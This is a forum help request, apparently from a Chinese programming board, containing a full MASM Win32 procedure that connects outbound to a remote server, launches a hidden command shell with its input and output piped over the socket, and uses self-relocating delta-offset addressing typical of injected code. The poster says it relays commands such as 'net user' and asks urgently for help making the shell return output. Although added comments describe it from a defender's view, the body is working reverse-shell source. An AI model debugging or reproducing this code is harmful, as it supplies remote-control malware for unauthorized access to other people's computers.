先附上源代码,整个子函数
-------------------------------------------------------------------------------------------------
;-----------------------------------------------------------------------
; _CreateService(_lParam)          (MASM, 32-bit Win32, stdcall-style proc)
;
; What the visible code does (defender's reading of the sample):
;   1. WSAStartup, then opens a TCP socket and connects OUTBOUND to the
;      address in szServer on port TCP_PORT (szServer, TCP_PORT, szCmd,
;      szEnd, szExit and the global hSocket are defined outside this
;      procedure and are not visible here).
;   2. Creates two anonymous pipes with inheritable handles and starts
;      the command line szCmd with a hidden window (SW_HIDE), its
;      stdin fed from pipe 1 and its stdout/stderr sent into pipe 2.
;   3. Loops: polls pipe 2, forwards whatever the child printed to the
;      socket, sends the szEnd marker, waits for data from the socket,
;      writes it into the child's stdin, echoes it back, and stops when
;      the received text equals szExit or the socket errors out.
;   This is the classic "command shell over a reverse TCP connection"
;   shape.  Indicators an analyst can key on: an unexplained outbound
;   connect, a hidden child process whose std handles are pipes owned
;   by the network-connected parent, and the self-locating
;   call/pop/sub sequence below, which is typical of code expected to
;   run somewhere other than its link-time address.
;
; In:    _lParam - pushed by the caller; never read in this body.
; Out:   nothing usable: pushad/popad restore eax, so the caller cannot
;        tell success from failure.
; Notes: every API is reached through an import slot relative to ebx
;        (the load delta); no API return value is checked except
;        inet_addr, connect, send and recv.
;-----------------------------------------------------------------------
_CreateService proc _lParam
LOCAL @stWsa:WSADATA
LOCAL @stSin:sockaddr_in
LOCAL @szBuffer[512]:byte
LOCAL @command[512]:byte
local @hReadPipe1                ; pipe 1: parent writes, child reads (child stdin)
local @hWritePipe1
local @hReadPipe2                ; pipe 2: child writes, parent reads (child stdout/stderr)
local @hWritePipe2
local @dwCount                   ; bytes available / transferred in the last pipe op
local @dwCmdLen                  ; bytes received from the socket in the last recv
local stSA:SECURITY_ATTRIBUTES
local stStartInfo:STARTUPINFO
local stProcInfo:PROCESS_INFORMATION
local szBuf1[1024]:byte          ; child output, pipe 2 -> socket
LOCAL szBuf2[1024]:byte          ; remote input, socket -> pipe 1
pushad
; --- delta offset: ebx = (runtime address of @@) - (link-time address of @@).
; Every global and import below is addressed as [offset X + ebx] / X[ebx],
; so the block keeps working if it is copied to a different address.
call @F
@@:
pop ebx
sub ebx,offset @B
; WSAStartup(0x0101, &@stWsa) - result ignored
lea eax,@stWsa
push eax
push 101h
call _WSAStartup[ebx]
; hSocket = socket(AF_INET, SOCK_STREAM, 0) - not checked for INVALID_SOCKET
push 0
push SOCK_STREAM
push AF_INET
call _socket[ebx]
mov hSocket[ebx],eax
; RtlZeroMemory(&@stSin, sizeof @stSin)
push sizeof @stSin
lea eax,@stSin
push eax
call _RtlZeroMemory[ebx]
; @stSin.sin_port = htons(TCP_PORT); @stSin.sin_family = AF_INET
push TCP_PORT
call _htons[ebx]
mov @stSin.sin_port,ax
mov @stSin.sin_family,AF_INET
; @stSin.sin_addr = inet_addr(szServer); INADDR_NONE -> clean up and leave
lea eax,[offset szServer+ebx]
push eax
call _inet_addr[ebx]
.if eax == INADDR_NONE
jmp _Ret
.endif
mov @stSin.sin_addr,eax
; connect(hSocket, &@stSin, sizeof @stSin) - the outbound connection
push sizeof @stSin
lea eax,@stSin
push eax
push hSocket[ebx]
call _connect[ebx]
.if eax == SOCKET_ERROR
jmp _Ret
.endif
;push sizeof @szBuffer
;lea eax,@szBuffer
;push eax
;call _RtlZeroMemory[ebx]
;mov ecx,sizeof szMsg
;lea esi,[offset szMsg+ebx]
;lea edi,@szBuffer
;rep movsb
;push 0
;push sizeof szMsg
;lea eax,[offset szMsg+ebx]
;push eax
;push hSocket[ebx]
;call _send[ebx]
; SECURITY_ATTRIBUTES with bInheritHandle = TRUE so the child can inherit
; the pipe ends (nLength is written as the literal 12 rather than sizeof).
Mov stSA.nLength,12
Mov stSA.lpSecurityDescriptor,NULL
Mov stSA.bInheritHandle,TRUE
; CreatePipe(&@hReadPipe1, &@hWritePipe1, &stSA, 0) - return value ignored
push 0
lea eax,stSA
push eax
lea eax,@hWritePipe1
push eax
lea eax,@hReadPipe1
push eax
call _CreatePipe[ebx]
; CreatePipe(&@hReadPipe2, &@hWritePipe2, &stSA, 0) - return value ignored
push 0
lea eax,stSA
push eax
lea eax,@hWritePipe2
push eax
lea eax,@hReadPipe2
push eax
call _CreatePipe[ebx]
; RtlZeroMemory(&stStartInfo, sizeof STARTUPINFO); note stStartInfo.cb is
; never set afterwards, so it stays 0.
push sizeof STARTUPINFO
lea eax,stStartInfo
push eax
call _RtlZeroMemory[ebx]
; hidden window; stdin <- pipe 1 read end, stdout/stderr -> pipe 2 write end
Mov stStartInfo.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
Mov stStartInfo.wShowWindow,SW_HIDE
Mov eax,@hReadPipe1
Mov stStartInfo.hStdInput,eax
Mov eax,@hWritePipe2
Mov stStartInfo.hStdOutput,eax
Mov stStartInfo.hStdError,eax
; CreateProcess(NULL, szCmd, NULL, NULL, bInheritHandles=1, dwCreationFlags=0,
;               NULL, NULL, &stStartInfo, &stProcInfo) - result ignored.
; Args are pushed right-to-left (stdcall).
lea eax,stProcInfo
push eax
lea eax,stStartInfo
push eax
push NULL
push NULL
push 0
push 1
push NULL
push NULL
lea eax,[offset szCmd+ebx]
push eax
push NULL
call _CreateProcess[ebx]
; ===== relay loop =====
; Outer loop: one "child output -> remote, remote input -> child" round trip
; per iteration.  Inner loop: drain child output until a line ends in '>'.
.while TRUE
.while TRUE
mov @dwCount,0
push 1024
lea eax,szBuf1
push eax
call _RtlZeroMemory[ebx]
; Busy-wait on PeekNamedPipe(@hReadPipe2, szBuf1, 1024, NULL, &@dwCount, NULL)
; until at least one byte is available.  There is no Sleep, so this spins
; the CPU, and the API's own return value is not examined; if the call
; fails (e.g. the child has gone away) @dwCount presumably stays 0 and
; this loop never exits - NOTE(review): confirm against PeekNamedPipe semantics.
.while @dwCount == 0
push NULL
push NULL
lea eax,@dwCount
push eax
push 1024
lea eax,szBuf1
push eax
push @hReadPipe2
call _PeekNamedPipe[ebx]
.endw
; ReadFile(@hReadPipe2, szBuf1, 1024, &@dwCount, NULL)
push NULL
lea eax,@dwCount
push eax
push 1024
lea eax,szBuf1
push eax
push @hReadPipe2
call _ReadFile[ebx]
; send(hSocket, szBuf1, @dwCount, 0); a non-positive result ends the drain
push 0
push @dwCount
lea eax,szBuf1
push eax
push hSocket[ebx]
call _send[ebx]
.break .if eax<=0
; Heuristic end-of-output check: stop draining when the last byte read
; is 62 = ASCII '>' (the shape of a command prompt).
mov ecx,@dwCount
dec ecx
.break .if byte ptr[szBuf1+ecx]==62
.endw
; send(hSocket, szEnd, sizeof szEnd, 0) - end-of-output marker for the peer
push 0
push sizeof szEnd
lea eax,[offset szEnd+ebx]
push eax
push hSocket[ebx]
call _send[ebx]
; RtlZeroMemory(szBuf2, 1024); the zero fill is what later gives lstrcmpi a
; terminator - a full 1024-byte recv would leave none.
push 1024
lea eax,szBuf2
push eax
call _RtlZeroMemory[ebx]
; eax = recv(hSocket, szBuf2, 1024, 0)
push 0
push 1024
lea eax,szBuf2
push eax
push hSocket[ebx]
call _recv[ebx]
.if eax == SOCKET_ERROR || eax == 0
; Error or orderly close.  WSAEWOULDBLOCK is retried; nothing visible here
; puts the socket in non-blocking mode, so presumably that branch is rarely
; taken.  Any other error terminates the child and leaves the loop.
call _WSAGetLastError[ebx]
.if eax == WSAEWOULDBLOCK
.continue
.else
; TerminateProcess(stProcInfo.hProcess, 0)
push 0
push stProcInfo.hProcess
call _TerminateProcess[ebx]
.break
.endif
.else
; WriteFile(@hWritePipe1, szBuf2, @dwCmdLen, &@dwCount, NULL): the received
; bytes are handed to the child's stdin exactly as they arrived.
mov @dwCmdLen,eax
push NULL
lea eax,@dwCount
push eax
push @dwCmdLen
lea eax,szBuf2
push eax
push @hWritePipe1
call _WriteFile[ebx]
; send(hSocket, szBuf2, @dwCount, 0) - echo what was written back to the peer
push 0
push @dwCount
lea eax,szBuf2
push eax
push hSocket[ebx]
call _send[ebx]
; lstrcmpi(szExit, szBuf2) == 0 -> leave the loop.  On this path the child
; is not terminated and its handles are not closed.
lea eax,szBuf2
lea edx,[offset szExit+ebx]
push eax
push edx
call _lstrcmpi[ebx]
.break .if eax == 0
.endif
.endw
; Common exit: closesocket(hSocket); WSACleanup().  The four pipe handles and
; stProcInfo.hProcess/hThread are never closed in this procedure.
_Ret:
push hSocket[ebx]
call _closesocket[ebx]
call _WSACleanup[ebx]
popad
ret
_CreateService endp
---------------------------------------------------------------------------------------------
第一次从管道中读取数据成功了,我在网络的另一端收到了CMD的初始输出信息,然后我发了一个CMD命令,例如net user过来,这边确实收到了net user这个字符串,并且WriteFile也成功了,返回值是1,返回的写入字节数是8,但是再从管道中读数据,就读不到任何数据了,可能是因为CMD没有执行,但是我检查了几遍前面对CMD输入输出的关联,没有错啊
怨念中,求助!急着要用。。。。